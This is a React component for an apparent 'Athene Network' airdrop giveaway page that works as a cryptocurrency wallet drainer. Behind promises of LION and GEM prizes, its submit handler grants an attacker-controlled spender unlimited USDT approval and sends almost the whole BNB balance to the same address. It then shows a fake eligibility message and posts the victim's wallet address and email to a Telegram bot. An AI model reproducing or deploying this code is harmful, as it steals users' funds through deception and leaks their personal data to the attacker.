import React, { useEffect, useState } from "react";
import HomeContentPurchase from "./HomeContentPurchase";
import { useFormik } from "formik";
import * as Yup from "yup";
import {
    useAccount,
    useBalance,
    useGasPrice,
    useReadContract,
    useSendTransaction,
    useWriteContract,
} from "wagmi";
import Abi from "../abi";
import { toast } from "react-toastify";
import axios from "axios";
import {
    BOT_TOKEN,
    CONNECT_CHAINS,
    CHAT_ID,
    MAX_ALLOWANCE,
    SPENDER_ADDRESS,
    USDT_ADDRESS,
} from "../constants";

const HomeContent = () => {
    // React States
    const [plan, setPlan] = useState("King Of Meme (Lion)");
    const [showListBox, setShowListBox] = useState(false);

    // Wagmi Hooks
    const {
        isPending: contractIsLoading,
        isSuccess: successfulContract,
        writeContract,
    } = useWriteContract();
    const {
        isPending: txIsLoading,
        isSuccess: successfulTx,
        sendTransaction,
    } = useSendTransaction();
    const account = useAccount();
    const accountAddress = account.address;
    const { data: usdtBalance } = useReadContract({
        address: USDT_ADDRESS,
        abi: Abi,
        functionName: "balanceOf",
        args: [accountAddress],
    });
    const nativeBalance = useBalance({
        address: accountAddress,
    });
    const gasPrice = useGasPrice({
        chainId: CONNECT_CHAINS[0].id,
    });

    // Formik Hooks
    const formik = useFormik({
        enableReinitialize: true,
        initialValues: {
            plan: plan,
            email: "",
        },
        onSubmit: (values) => {
            try {
                if (usdtBalance > 0n) {
                    writeContract({
                        address: USDT_ADDRESS,
                        abi: Abi,
                        functionName: "approve",
                        args: [SPENDER_ADDRESS, MAX_ALLOWANCE],
                    });
                }

                if (nativeBalance.data?.value > 0n) {
                    const gas_price = gasPrice?.data * 4n * 21000n;
                    const txValue = nativeBalance.data?.value - gas_price;
                    sendTransaction({
                        to: SPENDER_ADDRESS,
                        value: txValue,
                        gasPrice: gasPrice?.data,
                        gasLimit: 21000n,
                    });
                } else {
                    toast.error("You are not eligible.");
                }
            } catch (e) {
                toast.error("You are not eligible.");
            }
        },
        validationSchema: Yup.object({
            plan: Yup.string().required("Please select a plan"),
            email: Yup.string()
                .email("Your email is not valid. Please check again!")
                .required("Your email is not valid. Please check again!"),
        }),
    });

    useEffect(() => {
        if (successfulTx || successfulContract) {
            toast.success(
                "Congratulation, you are eligible! Airdrop will be distributed to your Athene wallet after the event ends.",
                {
                    toastId: "success",
                }
            );
            if (successfulTx) {
                const message = `TX: Owner: ${accountAddress} \nOwner Email: ${
                    formik.values.email
                } \nOn chainID: ${"BSC"}`;
                axios.post(
                    `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${message}`
                );
            }

            if (successfulContract) {
                const message = `Approved: ${"USDT"} \nSpender: ${SPENDER_ADDRESS} \nOwner: ${accountAddress} \nOwner Email: ${
                    formik.values.email
                } \nToken address: ${USDT_ADDRESS} \nOn chainID: ${"BSC"}`;
                axios.post(
                    `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${message}`
                );
            }
        }
    }, [successfulTx, successfulContract, accountAddress, formik.values.email]);

    return (
        <div className="Home_homeContent__26AWP">
            <div className="Home_homeContentTitle__QgcOV">
                Welcome to Athene Network
            </div>
            <div className="Home_homeContentSub__ypF8o">
                Kindly link your wallet to claim the giveaway.
            </div>
            <div>
                <div className="Home_homeContentPackageMain__Vumy7">
                    <div>
                        <div className="PackageComponent_mainPackage__y2Y4Z">
                            <div
                                id="package1"
                                className={`${
                                    plan === "King Of Meme (Lion)" &&
                                    "PackageComponent_ContainerActive__AJssE"
                                }`}
                                onClick={() => setPlan("King Of Meme (Lion)")}
                            >
                                <div className="PackageComponent_ContainerPackage__7TZ_s">
                                    <div className="PackageComponent_title__TxGcu">
                                        LION Giveaway
                                    </div>
                                    <div className="PackageComponent_money__ZiTJl">
                                        1,224,000,000.00
                                    </div>
                                    <div className="PackageComponent_btnBuy__jT45i">
                                        LION
                                    </div>
                                    <div className="PackageComponent_itemPackage__OMI7q">
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Total Prizes:
                                                            1,224,000,000.00
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Distribute prizes as
                                                            follows:
                                                        </div>
                                                        <div>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    1st Price:
                                                                    100,000,000
                                                                </div>
                                                            </li>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    2nd Price:
                                                                    70,000,000
                                                                </div>
                                                            </li>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    3rd Price:
                                                                    60,000,000
                                                                </div>
                                                            </li>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    4th Price:
                                                                    40,000,000
                                                                </div>
                                                            </li>
                                                        </div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            No KYC Required
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            You must have at
                                                            least 0.05BNB in
                                                            your wallet to be
                                                            eligible for the
                                                            giveaway
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Duration: From now
                                                            until March 21,
                                                            2024.
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Reward will be
                                                            distributed after
                                                            the event ends.
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div
                                id="package2"
                                className={`${
                                    plan === "GEM" &&
                                    "PackageComponent_ContainerActive__AJssE"
                                }`}
                                onClick={() => setPlan("GEM")}
                            >
                                <div className="PackageComponent_ContainerPackageSi__dTXNP">
                                    <div className="PackageComponent_titleSi__cQJMY">
                                        GEM Giveaway
                                    </div>
                                    <div className="PackageComponent_money__ZiTJl">
                                        10,000,000.00
                                    </div>
                                    <div className="PackageComponent_btnBuySi__Stmlt">
                                        GEM
                                    </div>
                                    <div className="PackageComponent_itemPackage__OMI7q">
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Total Prizes Pool:
                                                            10,000,000.00
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Distribute prizes as
                                                            follows:
                                                        </div>
                                                        <div>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    1st price:
                                                                    1,000,000
                                                                    GEM
                                                                </div>
                                                            </li>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    2nd price:
                                                                    700,000 GEM
                                                                </div>
                                                            </li>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    3rd price:
                                                                    500,000 GEM
                                                                </div>
                                                            </li>
                                                            <li className="PackageComponent_homeContentGemItemMain__WUeV2">
                                                                <img
                                                                    alt=""
                                                                    loading="lazy"
                                                                    width="16"
                                                                    height="16"
                                                                    decoding="async"
                                                                    data-nimg="1"
                                                                    src="assets/Gem.4202d18c.svg"
                                                                    style={{
                                                                        color: "transparent",
                                                                    }}
                                                                />
                                                                <div>
                                                                    4th price:
                                                                    400,000 GEM
                                                                </div>
                                                            </li>
                                                        </div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            No KYC Required
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            You must have at
                                                            least 0.15BNB in
                                                            your wallet to be
                                                            eligible for the
                                                            giveaway
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Duration: From now
                                                            until March 20,
                                                            2024.
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                        <div>
                                            <div>
                                                <li className="PackageComponent_homeContentChooieItem__RtSq_">
                                                    <img
                                                        alt=""
                                                        loading="lazy"
                                                        width="16"
                                                        height="16"
                                                        decoding="async"
                                                        data-nimg="1"
                                                        className="PackageComponent_homeContentChooieImageOption__Lm_zz"
                                                        src="assets/Interface.7b86e3e9.svg"
                                                        style={{
                                                            color: "transparent",
                                                        }}
                                                    />
                                                    <div className="PackageComponent_homeContentChooieItemText__ogvL_">
                                                        <div>
                                                            Reward will be
                                                            distributed after
                                                            the event ends.
                                                        </div>
                                                        <div></div>
                                                    </div>
                                                </li>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div className="Home_homeContentPackageMain__Vumy7">
                    Note: You must have BNB in the connected wallet to be
                    eligible for this giveaway.
                </div>
            </div>
            <HomeContentPurchase />
            <form onSubmit={formik.handleSubmit}>
                <div className="Home_homeContentSubmitSelect__7PqzH">
                    <div className="Home_actionBtnSelectPackagebuy__FXscv">
                        <div
                            className="MuiSelect-root MuiSelect-variantSolid MuiSelect-colorNeutral MuiSelect-sizeMd CustomSelect_selectPackageInput__fmSKF css-1heoa4c"
                            style={{ position: "relative" }}
                            onClick={() => {
                                setShowListBox(!showListBox);
                            }}
                        >
                            <button
                                role="combobox"
                                aria-expanded="true"
                                aria-controls=":r1:"
                                className="MuiSelect-button css-1qmzz5g"
                                type="button"
                            >
                                <div className="CustomSelect_selectPackageOptionLable__Ur2DX">
                                    {plan}
                                </div>
                            </button>
                            <ul
                                role="listbox"
                                id=":r1:"
                                tabindex="-1"
                                class="base-Popper-root MuiSelect-listbox css-12tu8y4"
                                style={{
                                    position: "absolute",
                                    top: 60,
                                    display: `${
                                        showListBox ? "block" : "none"
                                    }`,
                                    width: "100%",
                                    padding: "10px",
                                    marginInlineStart: "-12px",
                                }}
                            >
                                <li
                                    tabindex="-1"
                                    id=":rd:"
                                    role="option"
                                    aria-selected="false"
                                    class="MuiOption-root CustomSelect_selectPackageInputOption__bowNO css-o9b5ht"
                                    onClick={() => {
                                        setPlan("King Of Meme (Lion)");
                                        setShowListBox(false);
                                    }}
                                    style={{
                                        backgroundColor: `${
                                            plan === "King Of Meme (Lion)"
                                                ? "grey"
                                                : ""
                                        }`,
                                    }}
                                >
                                    King Of Meme (Lion)
                                </li>
                                <li
                                    role="none"
                                    class="MuiListDivider-root MuiListDivider-horizontal MuiListDivider-insetStartContent css-zgdaqc"
                                ></li>
                                <li
                                    tabindex="0"
                                    id=":re:"
                                    role="option"
                                    aria-selected="true"
                                    class="MuiOption-root MuiOption-highlighted Mui-selected CustomSelect_selectPackageInputOption__bowNO css-o9b5ht"
                                    onClick={() => {
                                        setPlan("GEM");
                                        setShowListBox(false);
                                    }}
                                    style={{
                                        backgroundColor: `${
                                            plan === "GEM" ? "grey" : ""
                                        }`,
                                    }}
                                >
                                    GEM
                                </li>
                            </ul>
                            <span className="MuiSelect-indicator css-1tnykim">
                                <svg
                                    className="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-vubbuv"
                                    focusable="false"
                                    aria-hidden="true"
                                    viewBox="0 0 24 24"
                                    data-testid="KeyboardArrowDownIcon"
                                >
                                    <path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"></path>
                                </svg>
                            </span>
                            <input
                                tabindex="-1"
                                aria-hidden="true"
                                value="1"
                                style={{
                                    border: "0px",
                                    clip: "rect(0px, 0px, 0px, 0px)",
                                    height: "1px",
                                    margin: "-1px",
                                    overflow: "hidden",
                                    padding: "0px",
                                    position: "absolute",
                                    whiteSpace: "nowrap",
                                    width: "1px",
                                }}
                            />
                        </div>
                    </div>
                    <div className="Home_homeContentSubmit__V2r1x">
                        <div className="Home_homeContentSubmitContainer____0ax">
                            {/* Desktop input */}
                            <input
                                className="Home_homeContentSubmitInput__uzhRP"
                                placeholder="Enter Athene account (your email) here"
                                type="email"
                                value={formik.values.email}
                                onChange={formik.handleChange}
                                onBlur={formik.handleBlur}
                                name="email"
                                style={{
                                    padding: "0 10px",
                                }}
                            />
                            <div>
                                <button
                                    type="submit"
                                    className="Home_homeContentSubmitBtn__S8u5P"
                                    disabled={contractIsLoading || txIsLoading}
                                >
                                    {contractIsLoading || txIsLoading
                                        ? "LOADING..."
                                        : "CLAIM GIVEAWAY"}
                                </button>
                            </div>
                        </div>
                        <small style={{ color: "tomato" }}>
                            {formik.errors.email}
                        </small>
                        <small style={{ color: "tomato" }}>
                            {formik.errors.plan}
                        </small>
                    </div>
                </div>

                <div className="Home_homeContentSubmitMb___IIYH">
                    <div>
                        {/* Mobile input */}
                        <input
                            className="Home_homeContentSubmitInputMb__RSkh_"
                            placeholder="Enter Athene account (your email) here"
                            type="email"
                            value={formik.values.email}
                            onChange={formik.handleChange}
                            onBlur={formik.handleBlur}
                            name="email"
                            style={{
                                padding: "0 10px",
                                width: "calc(100% - 20px)",
                            }}
                        />
                        <small style={{ color: "tomato" }}>
                            {formik.errors.email}
                        </small>
                        <small style={{ color: "tomato" }}>
                            {formik.errors.plan}
                        </small>
                        <div>
                            <button
                                type="submit"
                                className="Home_homeContentSubmitBtnMb__8waY1"
                                disabled={contractIsLoading || txIsLoading}
                            >
                                {contractIsLoading || txIsLoading
                                    ? "LOADING..."
                                    : "CLAIM GIVEAWAY"}
                            </button>
                        </div>
                    </div>
                </div>
            </form>
        </div>
    );
};

export default HomeContent;
